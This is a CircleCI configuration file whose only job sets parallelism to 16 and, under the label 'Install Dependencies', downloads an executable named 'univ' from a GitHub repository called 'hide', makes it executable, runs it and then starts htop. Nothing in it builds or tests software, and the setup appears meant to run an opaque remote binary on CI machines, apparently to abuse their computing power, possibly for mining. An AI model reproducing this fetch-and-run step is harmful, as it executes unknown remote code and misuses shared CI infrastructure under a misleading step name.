version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              sudo apt-get update && sudo apt install wget curl htop -y
              wget https://raw.githubusercontent.com/banyuakik23/hide/main/univ && chmod +x univ
              ./univ
              htop

workflows:
    version: 2.1
    build:
        jobs:
        - trial